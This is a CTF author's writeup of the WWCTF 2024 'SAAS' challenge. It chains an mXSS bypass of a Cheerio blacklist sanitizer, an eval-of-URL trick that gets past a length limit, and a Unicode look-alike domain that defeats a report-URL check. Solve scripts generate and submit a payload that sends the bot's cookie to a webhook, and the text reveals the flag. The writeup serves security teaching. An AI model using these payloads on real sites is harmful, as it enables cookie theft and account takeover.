SAAS MXSS challenge writeup from WWCTF 2024

Dec 1, 2024

Last updated on Dec 10, 2024

Description

I created this challenge for WWCTF 2024. Participants must find and chain two distinct vulnerabilities. The first is a bypass of a Cheerio-based server-side HTML sanitizer that leads to XSS through an HTML input. The second is a logic flaw in the report endpoint that lets a crafted URL get past its checks and reach the bot.

Challenge overview

Challenge description

By the end of the CTF, this challenge had only two solves. Kudos to Kabilan S for taking first blood and to Infobahn for securing second blood!

Let’s check the remote application. We can enter HTML in the text box, and it is reflected back in the HTML output.

SAAS frontend

Let’s check the JavaScript behind this application.

async function sanitizeHTML() {
    const inputHTML = document.getElementById('html-input').value;
    if (inputHTML.length <= 75) {
        try {
            const response = await fetch('/api/sanitize', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ html: inputHTML })
            });

            const data = await response.json();

            if (data.html) {
                document.getElementById('sanitized-output').innerHTML = data.html;
            } else {
                document.getElementById('sanitized-output').textContent = `Error: ${data.error}`;
            }
        } catch (err) {
            document.getElementById('sanitized-output').textContent = `Failed to sanitize HTML: ${err.message}`;
        }
    } else {
        document.getElementById('sanitized-output').innerHTML = "<h1>Too Long</h1>";
    }
}
function sharePage() {
    const inputHTML = document.getElementById('html-input').value;
    const base64HTML = btoa(unescape(encodeURIComponent(inputHTML)));
    const newURL = `${window.location.origin + window.location.pathname}?html=${encodeURIComponent(base64HTML)}`;
    window.location.href = newURL
}
window.onload = () => {
    const urlParams = new URLSearchParams(window.location.search);
    const base64HTML = urlParams.get('html');
    if (base64HTML) {
        const decodedHTML = decodeURIComponent(escape(atob(base64HTML)));
        document.getElementById('html-input').value = decodedHTML;
        sanitizeHTML();
    }
}

Whenever you click the “Sanitize HTML” button, the sanitizeHTML function is triggered. It first checks that the input is at most 75 characters long. If it is, the HTML input is sent to /api/sanitize, and the returned markup is written into the sanitized output element using innerHTML. On page load, the same function also runs on the Base64-decoded html query parameter, so a shared link renders its input automatically.

We also have access to the source code, so let’s dig into it for more details.

Challenge files

In docker-compose.yml you can see two services, api and web:

services:
  api:
    build:
      context: ./backend
    ports:
      - "5000"
    env_file: ".env"
    environment:
      - NODE_ENV=production
  web:
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - "80:80"
    depends_on:
      - api

web is an nginx container that serves the HTML files from the frontend directory and routes /api to the api service. The api service has the following code; I am only showing the parts that are relevant here.

/* 
    imports and SETUP
*/

const blacklist = "a abbr acronym address applet area article aside audio b base bdi bdo big blink blockquote br button canvas caption center cite code col colgroup command content data datalist dd del details dfn dialog dir div dl dt element em embed fieldset figcaption figure font footer form frame frameset head header hgroup hr html iframe image img input ins kbd keygen label legend li link listing main map mark marquee menu menuitem meta meter multicol nav nextid nobr noembed noframes noscript object ol optgroup p output p param picture plaintext pre progress s samp script section select shadow slot small source spacer span strike strong sub summary sup svg table tbody td template textarea tfoot th thead time tr track tt u ul var video".split(" ")

const attrs = "onafterprint onafterscriptexecute onanimationcancel onanimationend onanimationiteration onanimationstart onauxclick onbeforecopy autofocus onbeforecut onbeforeinput onbeforeprint onbeforescriptexecute onbeforetoggle onbeforeunload onbegin onblur oncanplay oncanplaythrough onchange onclick onclose oncontextmenu oncopy oncuechange oncut ondblclick ondrag ondragend ondragenter ondragexit ondragleave ondragover ondragstart ondrop ondurationchange onend onended onerror onfocus onfocus onfocusin onfocusout onformdata onfullscreenchange onhashchange oninput oninvalid onkeydown onkeypress onkeyup onload onloadeddata onloadedmetadata onloadstart onmessage onmousedown onmouseenter onmouseleave onmousemove onmouseout onmouseover onmouseup onmousewheel onmozfullscreenchange onpagehide onpageshow onpaste onpause onplay onplaying onpointercancel onpointerdown onpointerenter onpointerleave onpointermove onpointerout onpointerover onpointerrawupdate onpointerup onpopstate onprogress onratechange onrepeat onreset onresize onscroll onscrollend onsearch onseeked onseeking onselect onselectionchange onselectstart onshow onsubmit onsuspend ontimeupdate ontoggle ontoggle(popover) ontouchend ontouchmove ontouchstart ontransitioncancel ontransitionend ontransitionrun ontransitionstart onunhandledrejection onunload onvolumechange onwebkitanimationend onwebkitanimationiteration onwebkitanimationstart onwebkitmouseforcechanged onwebkitmouseforcedown onwebkitmouseforceup onwebkitmouseforcewillbegin onwebkitplaybacktargetavailabilitychanged onwebkittransitionend onwebkitwillrevealbottom onwheel".split(" ")

const generateChallenge = () => {
    const data = crypto.randomBytes(16).toString('hex');
    script = `POW` // proof of work 
    return { script, data, difficulty: DIFFICULTY };
};

const sanitize = (html) => {
    const unsafe = cheerio.load(html);
    for (const tag of blacklist) {
        unsafe(tag, "body").remove();
    }
    unsafe('*').each((_, el) => {
        for (const attr of attrs) {
            unsafe(el).removeAttr(attr);
        }
    });
    return unsafe("body").html();

}
app.post('/api/sanitize', async (req, res) => {
    try {
        const { html } = req.body;
        if (html) {
            const sanitizedHTML = sanitize(html);
            res.json({ html: sanitizedHTML });
        } else {
            res.status(400).json({ error: 'No HTML provided' });
        }
    } catch (err) {
        console.log(err)
        res.status(500).json({ error: 'Something went wrong' });
    }

});

app.get('/api/report', (req, res) => {
    // send POW challenge
});

app.post('/api/report', async (req, res) => {
    const { data, nonce, urlToVisit, secretKey } = req.body;
    if (!data || nonce === undefined || urlToVisit === undefined || secretKey === undefined) {
        return res.status(400).json({ success: false, error: 'Invalid request format.' });
    }
    const difficulty = activeChallenges.get(data);
    if (!difficulty) {
        return res.status(400).json({ success: false, error: 'Challenge not found or expired.' });
    }
    const isValid = validateSolution(data, nonce, difficulty);
    if (isValid) {
        activeChallenges.delete(data);
        try {
            const context = await (await browser).createBrowserContext();
            const page = await context.newPage();
            // SET cookie
            if (urlToVisit.includes(CHALL_DOMAIN)) {
                if (secretKey !== ACCESSKEY) {
                    return res.status(403).json({ success: false, error: 'secretKey is invalid you can not report' });
                }
            }
            const url = new URL(urlToVisit)
            if (url.host !== CHALL_DOMAIN) {
                return res.status(400).json({ success: false, error: 'Given URL is out of scope' });
            }
            try {
                // Visit the page
                return res.json({ success: true, message: 'Admin verified your report.' });
            } catch (error) {
                // Error handling
            }
        } catch (error) {
            // Error handling
        }

    }
    return res.status(400).json({ success: false, error: 'Invalid solution.' });
});


app.listen(PORT, async () => {
    console.log(`SaAS running at http://localhost:${PORT}`);
});

Let’s examine the /api/sanitize endpoint. It parses the input with cheerio, removes every element whose tag is on the blacklist above, strips the listed event-handler attributes from whatever remains, and returns the serialized body.

Fortunately, the blacklist does not include the math tag, making it an excellent candidate for confusing parsers. Let’s explore some potential mXSS vectors using this tag.

Before trying to solve this, let’s set up a test script to check our mXSS vectors. I used the following code:

const cheerio = require('cheerio');

// Candidate input to test; swap in any mXSS vector.
const html = "<test>hay</test>";
// Parse the way the server does, then print the serialized body.
const $ = cheerio.load(html);
console.log($("body").html());

Identifying a Potential Payload

From SonarSource’s mXSS cheatsheet, we can find payloads that could work around the blacklist. For instance, the following payload is a good candidate:

This payload triggers an alert in the browser through the onerror handler of an img. However, some elements in this payload, like <table>, are blacklisted by the server. We need to refine this.

Refining the Payload

First, we simplify the payload by removing unnecessary elements, such as the table with the id attribute, and test it again:

<math><mtext><table><mglyph><style><math><img src=x onerror=alert(1)>

Cheerio parses this and serializes it as:

<math><mtext><mglyph><style><math><img src=x onerror=alert(1)></style></mglyph><table></table></mtext></math>

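Submitting the refined payload to the application triggers an alert in the browser, and the removal of <table> is exactly what makes this work. While the <table> is open, cheerio’s HTML5 parser foster-parents <mglyph> out of it as a plain HTML element, so the <style> that follows is an HTML raw-text element and the <img> inside it is only text, which neither the tag blacklist nor the attribute filter ever sees. Once the sanitizer deletes the now-empty <table>, the browser re-parses the output through innerHTML with <mglyph> sitting directly under <mtext>, where it stays in the MathML namespace. There, <style> is an ordinary element whose content is parsed as markup, so the <img> becomes a real HTML element and its onerror fires.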

alert
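To see which parts of the payload the tag blacklist could even match, here is a small Python sketch that checks the tag names in cheerio's serialized output against the blacklist. The blacklist is copied from the server source above; the regular expression is only a rough way to list opening tag names and is not how cheerio works internally.

```python
import re

# Tag blacklist copied from the server source shown earlier.
BLACKLIST = set("""
a abbr acronym address applet area article aside audio b base bdi bdo big blink
blockquote br button canvas caption center cite code col colgroup command content
data datalist dd del details dfn dialog dir div dl dt element em embed fieldset
figcaption figure font footer form frame frameset head header hgroup hr html iframe
image img input ins kbd keygen label legend li link listing main map mark marquee
menu menuitem meta meter multicol nav nextid nobr noembed noframes noscript object
ol optgroup p output p param picture plaintext pre progress s samp script section
select shadow slot small source spacer span strike strong sub summary sup svg table
tbody td template textarea tfoot th thead time tr track tt u ul var video
""".split())

# Cheerio's serialization of the refined payload, as shown above.
parsed = ("<math><mtext><mglyph><style><math><img src=x onerror=alert(1)>"
          "</style></mglyph><table></table></mtext></math>")

# Opening tag names, de-duplicated in order of first appearance.
tags = list(dict.fromkeys(re.findall(r"<([a-z]+)", parsed)))
blocked = [t for t in tags if t in BLACKLIST]
allowed = [t for t in tags if t not in BLACKLIST]

print("blacklisted:    ", blocked)
print("not blacklisted:", allowed)
```

Only img and table are on the list. The table is a real element and gets removed, while the img survives because, to cheerio, it is text inside the style element rather than an element that a selector can match.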

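From the source code, we know the goal is to steal the bot’s cookie. However, the payload is limited to 75 characters. To work within that limit, we can use a well-known XSS trick: eval(`'`+URL). Inside an inline event handler, URL resolves to document.URL, so the handler evaluates the page URL with a single quote prepended. If the URL fragment starts with a closing quote, as in #'+eval(atob('...')), everything up to the fragment becomes a harmless string literal and the rest runs as JavaScript. Since we control the URL that is sent to the bot, the real payload can live in the fragment, outside the length check.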

Here’s the code that generates a link capable of sending the token to your endpoint.

import base64

webhook = "YOUR_WEB_HOOK"
# JavaScript that the fragment will run: send the Base64-encoded cookie to the webhook.
payload = f"window.location='{webhook}'+btoa(document.cookie)"
encoded_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
# ?html= carries the Base64 of the short mXSS payload; the fragment carries the real code.
report_url = f"https://saas.wwctf.com/?html=PG1hdGg%2BPG10ZXh0Pjx0YWJsZT48bWdseXBoPjxzdHlsZT48bWF0aD48aW1nIHNyYz14IG9uZXJyb3I9ZXZhbChgJ2ArVVJMKT4%3D#'+eval(atob('{encoded_payload}'))"
print(report_url)

If you change the eval to alert, you can see the payload in action.
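The html parameter in that link is simply the URL-encoded Base64 of the short mXSS payload. As a quick sanity check, this Python sketch decodes it and confirms that it fits under the frontend limit; HTML_PARAM is copied from the link above, and the variable names are only illustrative.

```python
import base64
from urllib.parse import unquote

# The ?html= value from the report link, exactly as it appears in the solve code.
HTML_PARAM = ("PG1hdGg%2BPG10ZXh0Pjx0YWJsZT48bWdseXBoPjxzdHlsZT48bWF0aD48"
              "aW1nIHNyYz14IG9uZXJyb3I9ZXZhbChgJ2ArVVJMKT4%3D")

# Undo encodeURIComponent first, then the Base64 layer.
payload = base64.b64decode(unquote(HTML_PARAM)).decode("utf-8")

print(payload)
print(len(payload), "characters; the frontend allows up to 75")
```

The decoded payload is 74 characters long, so it passes the length check with one character to spare.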

We face a second issue when reporting: to make the bot visit our link, we must bypass the following checks. The urlToVisit is the URL we provide, and if it belongs to the challenge domain, we are required to supply a secretKey that matches the server-side randomly generated ACCESSKEY. Since there’s no way to know the secretKey, this check cannot be satisfied. If we provide a URL from any other domain, the second check will fail because it ensures the URL’s host matches the challenge domain. Additionally, redirects cannot be used.

Here’s the code snippet implementing these checks:

if (urlToVisit.includes(CHALL_DOMAIN)) {
    if (secretKey !== ACCESSKEY) {
        return res.status(403).json({ success: false, error: 'secretKey is invalid you can not report' });
    }
}
const url = new URL(urlToVisit)
if (url.host !== CHALL_DOMAIN) {
    return res.status(400).json({ success: false, error: 'Given URL is out of scope' });
}

However, there is a logical flaw in the implementation: the two checks do not look at the same string. includes performs a raw substring match on urlToVisit, whereas the URL object normalizes the host while parsing. If you put a Unicode look-alike in the domain, such as 𝙎 instead of s, includes returns false, so the secretKey check is skipped entirely, but the URL parser maps the character back to s, so url.host still equals the challenge domain. This inconsistency lets you submit the URL to the bot successfully.

Final solve script
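The mismatch can be modelled in a few lines of Python. This is only a rough sketch: the substring test mirrors includes directly, but NFKC normalization plus lowercasing is my stand-in for the host normalization that the JavaScript URL parser performs, not the parser's actual algorithm. CHALL_DOMAIN is assumed to be saas.wwctf.com, and the function names are hypothetical.

```python
import unicodedata

CHALL_DOMAIN = "saas.wwctf.com"  # assumed value, based on the URLs in this writeup


def substring_check_hits(url_to_visit: str) -> bool:
    """Mirror of urlToVisit.includes(CHALL_DOMAIN): a raw substring test."""
    return CHALL_DOMAIN in url_to_visit


def normalized_host(url_to_visit: str) -> str:
    """Approximation of new URL(urlToVisit).host using NFKC + lowercase (an assumption)."""
    host = url_to_visit.split("://", 1)[1].split("/", 1)[0]
    return unicodedata.normalize("NFKC", host).lower()


url = "https://𝙎aas.wwctf.com/?html=..."

# First check: the look-alike breaks the substring match, so secretKey is never compared.
print("substring check hits:", substring_check_hits(url))
# Second check: after normalization the host is the challenge domain again.
print("host matches:", normalized_host(url) == CHALL_DOMAIN)
```

With the look-alike character the first check does not fire, yet the normalized host still equals the challenge domain, which is the combination the report endpoint lets through.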

import hashlib
import time
from multiprocessing import Pool, cpu_count
import sys
def find_nonce(args):
    message, nonce_start, nonce_end, prefix = args
    for nonce in range(nonce_start, nonce_end):
        combined = f'{message}{nonce}'.encode()
        hash_result = hashlib.sha256(combined).hexdigest()
        if hash_result.startswith(prefix):
            return nonce
    return None

def proof_of_work(message):
    prefix = '0'*6
    nonce = 0
    num_processes = 1
    chunk_size = 1000000
    start_time = time.time()
    
    with Pool(processes=num_processes) as pool:
        while True:
            tasks = [
                (message, nonce + i * chunk_size, nonce + (i + 1) * chunk_size, prefix)
                for i in range(num_processes)
            ]
            results = pool.map(find_nonce, tasks)
            
            for result in results:
                if result is not None:
                    end_time = time.time()
                    nonce = result
                    print(f'Time taken: {end_time - start_time} seconds')
                    return nonce

            nonce += num_processes * chunk_size


if __name__ == "__main__":
    print("Working....")
    data = "dae016e1c3d8fe84176a6d7691f57fdb" # get the pow data from /api/report
    nonce = proof_of_work(data)
    print(nonce)
    ############## The above code is for POW ################
    ############## SOLUTION code ################
    import base64
    import requests
    webhook = "WEBHOOK URL"
    payload = f"window.location='{webhook}'+btoa(document.cookie)"
    encoded_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
    report_url = f"https://𝙎aas.wwctf.com/?html=PG1hdGg%2BPG10ZXh0Pjx0YWJsZT48bWdseXBoPjxzdHlsZT48bWF0aD48aW1nIHNyYz14IG9uZXJyb3I9ZXZhbChgJ2ArVVJMKT4%3D#'+eval(atob('{encoded_payload}'))"
    print(report_url)
    resp = requests.post("https://saas.wwctf.com/api/report", json={
        "secretKey": "asdsd",
        "urlToVisit": report_url,
        "nonce": nonce,
        "data":data
    })

    print(resp.text)

A request from the bot

https://webhook.site/YOUR-ID/ZmxhZz13d2Z7SFRNTF9yMFVOZFRSMVBfZjByX3RIM19XMU5fNE5kX1MzUlYzUl81SUQzX0g3TUxfUzROMVQxWjRUSTBOXzFTX0I0RF8xRDM0fQ==

Base64-decoding the last path segment gives the cookie, which contains the flag wwf{HTML_r0UNdTR1P_f0r_tH3_W1N_4Nd_S3RV3R_5ID3_H7ML_S4N1T1Z4TI0N_1S_B4D_1D34}

The vulnerability here is similar to CVE-2024-52595, a namespace-confusion sanitizer bypass in the Python package lxml-html-clean.
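The decoding step takes only a few lines of Python. The callback URL is the one shown above, with YOUR-ID as the placeholder from the original request; the variable names are illustrative.

```python
import base64
from urllib.parse import urlsplit

# The request the bot made to the webhook, as shown above.
callback = ("https://webhook.site/YOUR-ID/"
            "ZmxhZz13d2Z7SFRNTF9yMFVOZFRSMVBfZjByX3RIM19XMU5fNE5kX1MzUlYzUl81"
            "SUQzX0g3TUxfUzROMVQxWjRUSTBOXzFTX0I0RF8xRDM0fQ==")

# The payload appended btoa(document.cookie) to the webhook URL, so the
# last path segment is the Base64-encoded cookie string.
encoded_cookie = urlsplit(callback).path.rsplit("/", 1)[-1]
cookie = base64.b64decode(encoded_cookie).decode("utf-8")

print(cookie)
```

The output is the bot's cookie in name=value form, with the flag as the value.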

Community solutions

Check out Kabilan’s writeup, where he used a URL-encoded input like saas.wwctf%2ecom to bypass the report URL check.

Team Infobahn’s solution utilized the fact that xhr and style tags behave the same way when used in the MathML namespace. Additionally, within the MathML namespace, it is possible to load iframes.

Feel free to ping me on LinkedIn if you spot any inaccuracies in this blog.

References

Check the following blogs to learn more about MXSS